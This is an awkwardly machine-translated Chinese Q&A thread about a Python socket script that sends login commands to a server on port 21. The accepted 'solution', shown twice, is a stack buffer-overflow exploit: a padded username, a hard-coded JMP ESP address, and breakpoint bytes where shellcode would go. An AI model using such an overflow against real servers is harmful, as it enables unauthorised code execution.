Python模拟输入键
我写了一个简单的Python脚本,它应该使用用户名和密码连接到Telnet服务器。Python模拟输入键
该脚本如下:
#!/usr/bin/python
import sys
import socket
hostname = sys.argv[1]
password = "whatever"
username = "whatever"
connect = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
connect.connect((hostname, 21))
except:
print "[-] connection error"
response = connect.recv(2000)
print response
sys.exit(1)
connect.send("user %s\%r\%n" %username)
response = connect.recv(2000)
print response
connect.send("pass %\%r\%n" %password)
response = connect.recv(2000)
print response
connect.close()
的错误是:为什么它不
connect.send("user %s\%r\%n" %username)
response = connect.recv(2000)
print response
connect.send("pass %\%r\%n" %password)
response = connect.recv(2000)
print response
:
的连接工作,但我无法模拟与回车键不工作? 谢谢:)
编辑解决方案:
#!/usr/bin/python
import sys
import socket
hostname = sys.argv[1]
password = "whatever"
jmpesp= "\xED\x1E\x94\x7C"
username = "A"*485 + jmpesp + "\xcc"*(1024 - 485 - 4)
connect = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
connect.connect((hostname, 21))
except:
print "[-] Verbindungs Fehler"
response = connect.recv(2000)
print response
sys.exit(1)
connect.send("user %s\r\n" %username)
response = connect.recv(2000)
print response
connect.send("user %s\r\n" %password)
response = connect.recv(2000)
print response
connect.close()
Python支持的telnet库:telnetlib
你看看那一个? https://docs.python.org/2/library/telnetlib.html#module-telnetlib
还有一个例子,如何使用它:
import getpass
import sys
import telnetlib
HOST = "localhost"
user = raw_input("Enter your remote account: ")
password = getpass.getpass()
tn = telnetlib.Telnet(HOST)
tn.read_until("login: ")
tn.write(user + "\n")
if password:
tn.read_until("Password: ")
tn.write(password + "\n")
tn.write("ls\n")
tn.write("exit\n")
print tn.read_all()
问题是,我想用Bufferoverflow漏洞编写脚本。为此,我不能使用这个库。我只是不能注入这个库的shellcode .. –
但是,无论如何谢谢:) –
没错。但是你可以看看lib的实现以及它们如何将\ n发送到telnet服务器。我认为写功能可能会有用。 https://hg.python.org/cpython/file/2.7/Lib/telnetlib.py#l273 – aronadaal
解决方案的代码是:
#!/usr/bin/python
import sys
import socket
hostname = sys.argv[1]
password = "whatever"
jmpesp= "\xED\x1E\x94\x7C"
username = "A"*485 + jmpesp + "\xcc"*(1024 - 485 - 4)
connect = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
connect.connect((hostname, 21))
except:
print "[-] Verbindungs Fehler"
response = connect.recv(2000)
print response
sys.exit(1)
connect.send("user %s\r\n" %username)
response = connect.recv(2000)
print response
connect.send("user %s\r\n" %password)
response = connect.recv(2000)
print response
connect.close()
的错误是一种实现错误,该代码得到之前停止PROGRAMM执行。
这些行是否被执行?你之前有一个'sys.exit(1)',这会停止程序。 – matiasg
尝试删除'\ r'。 – cdarke
@DominicJarmann请将您的解决方案发布为不作为编辑,但作为单独的答案,您接受。 – zubergu